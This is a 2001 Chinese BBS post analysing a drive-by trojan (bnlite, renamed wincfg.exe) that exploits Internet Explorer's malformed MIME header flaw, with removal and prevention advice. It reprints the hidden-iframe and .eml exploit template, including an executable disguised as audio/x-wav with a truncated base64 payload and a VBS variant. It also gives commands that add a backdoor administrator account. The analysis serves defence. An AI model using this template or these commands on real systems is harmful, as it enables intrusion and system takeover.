荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: fast (平淡), 信区: Virus
标 题: 当心!浏览网页也会中木马
发信站: 荔园晨风BBS站 (Fri Aug 31 17:11:45 2001), 转信
当心!浏览网页也会中木马
小蓉··yesky
如果我对你说浏览网页也会感染木马,你相信吗?
其实,这已经不是相信不相信的问题了,在半年前就有人使用这种技术来使人中招
了!最近听说有人在浏览某个网站时中招,因此去那里看了看,在网页打开的过程中,
鼠标奇怪的变成沙漏形状,看来的确是有程序在运行。打开计算机的任务管理器,可以
看到多了一个wincfg.exe的进程。进程对应的文件在win2000下是c:\winnt\wincfg.exe
,在win98下为c:\windows\wincfg.exe。运行注册表编辑器regedit,在HKEY_LOCAL_MA
CHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run发现wincfg.exe,哈哈,原来
它将自己登记在注册表开机启动项中,这样每次开机都会自动运行wincfg.exe!
注:给你下套的人可以自己设定这个木马的启动键名和注册文件名,注册文件名也
就是运行时进程里的名称,因此大家看到的结果可能不相同。
运行金山毒霸,报告发现“backdoor bnlite”,哦,原来是木马bnlite服务端改名
为wincfg.exe。别看这个木马服务端程序不大(只有6.5K),但它的功能可不少:具有
ICQ通报功能、远程删除服务端功能、设定端口和运行名称、IP报信(报告服务端所在的
IP地址)、上传下载……如果你中了该木马,那么木马控制端所在完全可以通过这个木
马在你的电脑上建立一个隐藏的ftp服务,这样别人就有全部权限进入你的电脑了!控制
你的电脑将非常容易!
让我感兴趣的是,木马是如何下载到浏览了该主页的用户的计算机中、并运行起来
的。在IE中点击“工具”→“Internet选项”→“安全”→“自定义安全级别”,将Ac
tiveX相关选项全部都禁用,再浏览该网页,wincfg.exe还是下载并运行了!看来和Act
iveX无关。在“自定义安全级别”中有关文件下载的选项都禁止,再浏览该网页,哈哈
!这回wincfg.exe不再下载了。
我们来看看wincfg.exe是如何下载到浏览者计算机上的,在该网页上点击鼠标右键
,选择其中的“查看源代码”,在网页代码最后面发现了可疑的一句:
IFRAME src="wincfg.eml" width=1 height=1
注意到其中的“wincfg.eml”了吗?大家都知道eml为邮件格式,网页中要eml文件
干什么呢?非常可疑!再次浏览该网页,再看看任务管理器,wincfg.exe进程又回来了
,原来问题就在这个文件上!既然问题在这文件上,当然想办法搞到这个文件看看了。
用蚂蚁把文件下载下来,鼠标刚点上去,wincfg.exe又被执行了,真是阴魂不散啊!
打开a.eml,发现其内容如下:
From: "xxx" To: "xxx" Subject: xxxx
Date: Tue, 7 Apr 2001 15:16:57 +800
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--1
Content-Type: multipart/alternative;
boundary="2"
--2
Content-Type: text/html;
charset="gb2312"
Content-Transfer-Encoding: quoted-printable
HTML>
HEAD>
/HEAD>
BODY bgColor=3D#ffffff>
iframe src=3Dcid:THE-CID height=3D0 width=3D0>
/BODY>
--2--
--1
Content-Type: audio/x-wav;
name="wincfg.exe"
Content-Transfer-Encoding: base64
Content-ID:
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4
gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIh3BDsAAAAAAAAAAOAADwELAQQUAC
AAAAAQAAAAkAAAIL0AAACgAAAAwAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAADQA
AAAEAAAAAA……(以下删掉一大节)
--1
你看到的类似“TVqQAAMAAAAEAAAA//8AAL”这样的字符,就是wincfg.exe经过base
64编码的内容。上面这些代码中,关键的是下面这一段:
Content-Type: audio/x-wav;
name="wincfg.exe"
Content-Transfer-Encoding: base64
Content-ID:
其中,name="wincfg.exe"这一句定义了文件名称,在此为wincfg.exe。 而这一句
:Content-Transfer-Encoding: base64则定义了代码格式为base64。
从这句Content-ID: 开始才是代码的起步,“TVqQAAMAAAAEAAAA//8AAL”等为winc
fg.exe文件的BASE64方式编码,这个以BASE64方式编码的文件会反编译成wincfg.exe文
件并运行。这就是浏览该网页会中木马的原因!到此我就明白了,其实,所谓的浏览网
页会中木马,只是网页制作者利用了微软IE浏览器中存在的漏洞进行攻击的一个案例而
已,说白了就是利用了错误的MIME头进行攻击。
1.MIME简介
MIME(Multipurpose Internet Mail Extentions),一般译作“多用途的网际邮件扩
充协议”。顾名思义,它可以传送多媒体文件,在一封电子邮件中附加各种格式文件一
起送出。现在它已经演化成一种指定文件类型(Internet的任何形式的消息:e-mail,u
senet新闻和Web)的通用方法。在使用CGI程序时你可能接触过MIME类型,其中有一行叫
作Content-type的语句,它用来指明传递的就是MIME类型的文件(如text/html或text/p
lain)。
2.错误的MIME头漏洞的发现
该漏洞是由一个国外安全小组发现的,该小组发现在MIME在处理不正常的MIME类型
时存在个问题,攻击者可以创建一个Html格式的E-mail,该E-mail的附件为可执行文件
,通过修改MIME头,使IE不正确处理这个MIME所指定的可执行文件附件。在此,我们来
了解一下,IE是如何处理附件的:一般情况下如果附件是文本文件,IE会读它,如果是
VIDEO CLIP,IE会查看它;如果附件是图形文件,IE就会显示它;如果附件是一个EXE文
件呢?IE会提示用户是否执行!但令人恐惧的是,当攻击者更改MIME类型后,IE就不再
提示用户是否执行而直接运行该附件!从而使攻击者加在附件中的程序、攻击命令能够
按照攻击者设想的情况进行。大家不妨想像一下,如果前面提到的wincfg.exe不是木马
,而是恶意程序江民炸弹又会怎么样?刹那间,你的硬盘就完蛋了(如果你不懂解法的话
)!在Win9X\ME以及WinNT4和Win2k下的Internet Explorer 5.0、5.01、5.5均存在该漏
洞,我们常用的微软邮件客户端软件Outlook Express也存在此漏洞。
3.错误的MIME头漏洞的危害
让我们来看一下如果把上面所说的代码中最后这部分变为下面这样,会产生什么结
果呢?
--1
Content-Type: audio/x-wav;
name="hello.vbs"
Content-Transfer-Encoding: quoted-printable
Content-ID:
msgbox("你的计算机好危险哦") 说明:在此可以加上任意的VBS的代码
--1
将该程序编辑存为eml格式的文件,我们运行它,可以看到屏幕上打开一个窗体,显
示“你的计算机好危险哦”。对于这种利用错误的MIME头漏调用VBS文件的形式,会有多
大危害呢?想一想,当初的爱虫病毒是怎么样的?爱虫病毒还需要骗你执行它才使你中
毒,但一旦和错误MIME头漏洞结合起来,就根本不需要你执行了,只要你收了这封信且
阅读它,你就中招了。
不仅如此,MIME还可以与command、cmd命令相结合,进行进一步的攻击。
对于WIN9X用户来说,只要你的IE浏览器是5.0、5.01、5.5之中的任意一个版本,在
没打补丁的情况下,攻击者完全可以利用欺骗的方式让你打开含有攻击命令的、带有错
误MIME头的E-mail文件,达到攻击的目的。事实上,format、deletetree、move等一切
MS-DOS下的命令均可加载在其中。
而对于WINNT、WIN2K用户,尤其是那些不安分守己且网络安全知识贫乏的系统管理
员,利用公司的主服务器上网,攻击者可以给他发封信,然后利用在以上所示代码中加
上诸如:
net user test 1234567/add
net localgroup administrators test/add
这样的命令增加用户或者超级用户权限,达到进一步入侵的目的。
现在,再回过头来看看我所中的木马是怎么回事。其实,wincfg.exe这个文件在这
里相当于邮件的附件,从我们所列的代码中可以看到,攻击者把wincfg.exe的的类型定
义为audio/x-wav,由于邮件的类型为audio/x-wav时,IE存在的这个错误的MIME头漏洞
会将附件认为是音频文件自动尝试打开,结果导致邮件文件a.eml中的附件wincfg.exe被
执行。在win2000下,即使是用鼠标点击下载下来的a.eml,或是拷贝粘贴该文件,都会
导致a.eml中的附件被运行,微软的这个漏洞可真是害人不浅啊。现在看来,原先那些攻
击者想方设法欺骗被攻击目标执行修改过的木马等后门程序,是多么落后的手段啊!如
今,利用微软“创造”的这个大漏洞来进行攻击,是那么的简单、多么的容易啊!唯一
的条件就是被攻击目标使用IE5.0、5.01、5.5这些浏览器中的一种,使用IE浏览器的用
户到底有多少呢?看看你身边的朋友就知道答案了!
解决办法:
如果你浏览网页中了该木马,可以用下面的方法来加以解决:
(1)点击“开始”→“运行”,在弹出的对话框中输入regedit,回车。然后展开注
册表到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下删除
wincfg.exe;
(2)到你的计算机的系统目录下,如果操作系统是Win2000,则到c:\winnt下;如果
你的操作系统为Win98,则到c:\windows下,删除其中的wincfg.exe 文件。
(3)重新启动机器,一切OK了!
预防方法:
1.最好的办法是不使用IE和Outlook。可以用Netscape代替IE,用Foxmail代替Outl
ook。如果非要用,建议你按下面的方法进行操作:
(1)运行IE,点击“工具→Internet选项→安全→Internet区域的安全级别”,把安
全极别由“中”改为“高”。
(2)接着,点击“自定义级别”按钮,在弹出的窗口中,禁用“对标记为可安全执行
脚本的ActiveX控件执行脚本”选项。
(3)同理,在此窗口中禁用IE的“活动脚本”和“文件下载”功能。
(4)禁用所有的ActiveX控制和插件。
(5)设置资源管理器成“始终显示扩展名”。
(6)禁止以WEB方式使用资源管理器。
(7)取消“下载后确认打开”这种扩展名属性设置。
(8)永远不直接从IE浏览器中选择打开文件。
2.不要受陌生人的诱惑打开别人给你的RUL,如果确实想看,可以通过一些下载工具
把页面下载下来,然后用记事本等一些文本编辑工具打开查看代码。
3.微软公司为该漏洞提供了一个补丁,赶快到下面所列出的URL去看看吧:
http://www.microsoft.com/windows/ie/download/critical/
Q290108/default.asp
网络安全:http://netsafe.ayinfo.ha.cn/ E-mail:netsafe@371.net
--
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.0.127]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店